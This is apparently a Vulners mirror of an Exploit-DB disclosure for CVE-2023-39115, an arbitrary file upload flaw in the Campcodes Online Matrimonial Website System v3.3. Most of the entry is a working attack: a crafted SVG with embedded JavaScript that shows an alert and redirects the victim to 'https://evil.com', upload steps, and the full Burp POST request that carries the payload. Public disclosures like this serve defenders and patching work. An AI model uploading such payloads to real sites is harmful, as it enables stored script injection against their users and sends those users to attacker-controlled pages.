Vulners
Lucene search
Campcodes Online Matrimonial Website System v3.3 - Code Execution via malicious SVG file upload
šļøĀ 04 Aug 2023Ā 00:00:00Reported byĀ Rajdip Dey SarkarTypeĀ 
Ā exploitdbšĀ www.exploit-db.comšĀ 352Ā Views
| Reporter | Title | Published | Views | Family All 14 |
|---|---|---|---|---|
 | Campcodes Online Matrimonial Website System v3.3 - Code Execution via malicious SVG file upload | 4 Aug 202300:00 | ā | zdt |
 | Exploit for Unrestricted Upload of File with Dangerous Type in Campcodes Complete_Online_Matrimonial_Website_System_Script | 7 Aug 202316:04 | ā | githubexploit |
 | CVE-2023-39115 | 16 Aug 202315:15 | ā | attackerkb |
 | CVE-2023-39115 | 16 Aug 202322:50 | ā | circl |
 | Campcodes Online Matrimonial Website System Code Issue Vulnerability | 4 Aug 202300:00 | ā | cnnvd |
 | CVE-2023-39115 | 16 Aug 202300:00 | ā | cve |
 | CVE-2023-39115 | 16 Aug 202300:00 | ā | cvelist |
 | EUVD-2023-42861 | 3 Oct 202520:07 | ā | euvd |
 | CVE-2023-39115 | 16 Aug 202315:15 | ā | nvd |
 | CVE-2023-39115 | 16 Aug 202315:15 | ā | osv |
10
# Exploit Title: Online Matrimonial Website System v3.3 - Code Execution via malicious SVG file upload
# Date: 3-8-2023
# Category: Web Application
# Exploit Author: Rajdip Dey Sarkar
# Version: 3.3
# Tested on: Windows/Kali
# CVE: CVE-2023-39115
Description:
----------------
An arbitrary file upload vulnerability in Campcodes Online Matrimonial
Website System Script v3.3 allows attackers to execute arbitrary code via
uploading a crafted SVG file.
SVG Payload
------------------
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "
http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<polygon id="triangle" points="0,0 0,50 50,0" fill="#009900"
stroke="#004400"/>
<script type="text/javascript">
alert("You have been hacked!!")
window.location.href="https://evil.com"
</script>
</svg>
Steps to reproduce
--------------------------
-Login with your creds
-Navigate to this directory - /profile-settings
-Click on Gallery -> Add New Image -> Browser -> Add Files
-Choose the SVG file and upload done
-Click the image!! Payload Triggered
Burp Request
-------------------
POST /Matrimonial%20Script/install/aiz-uploader/upload HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0)
Gecko/20100101 Firefox/115.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-CSRF-TOKEN: I5gqfipOOKWwI74hfdtFC2kpUP0EggWb8Qf7Xd5E
Content-Type: multipart/form-data;
boundary=---------------------------167707198418121100152548123485
Content-Length: 1044
Origin: http://localhost
Connection: close
Referer: http://localhost/Matrimonial%20Script/install/gallery-image/create
Cookie: _session=5GnMKaOhppEZivuzZJFXQLdldLMXecD1hmcEPWjg;
acceptCookies=true; XSRF-TOKEN=I5gqfipOOKWwI74hfdtFC2kpUP0EggWb8Qf7Xd5E
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
-----------------------------167707198418121100152548123485
Content-Disposition: form-data; name="relativePath"
null
-----------------------------167707198418121100152548123485
Content-Disposition: form-data; name="name"
file (1).svg
-----------------------------167707198418121100152548123485
Content-Disposition: form-data; name="type"
image/svg+xml
-----------------------------167707198418121100152548123485
Content-Disposition: form-data; name="aiz_file"; filename="file (1).svg"
Content-Type: image/svg+xml
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "
http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<polygon id="triangle" points="0,0 0,50 50,0" fill="#009900"
stroke="#004400"/>
<script type="text/javascript">
alert("You have been hacked!!")
window.location.href="https://evil.com"
</script>
</svg>
-----------------------------167707198418121100152548123485--Data
Build on a solid foundation withĀ Vulners data
WeĀ provide theĀ essential building blocks forĀ cybersecurity solutions withĀ comprehensive, structured, andĀ constantly updated vulnerability andĀ exploits data
Api
Power your application withĀ Vulners API
The Vulners REST API offers reliable, high-performance access toĀ vulnerabilityĀ intelligence, withĀ 99.9%Ā SLAĀ uptime andĀ CDN-backed data delivery forĀ seamlessĀ global access
App
Assess and manage vulnerabilities withĀ VulnersĀ tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
04 Aug 2023 00:00Current
9.7High risk
Vulners AI Score9.7
CVSS 3.19.8
EPSS0.02212
SSVC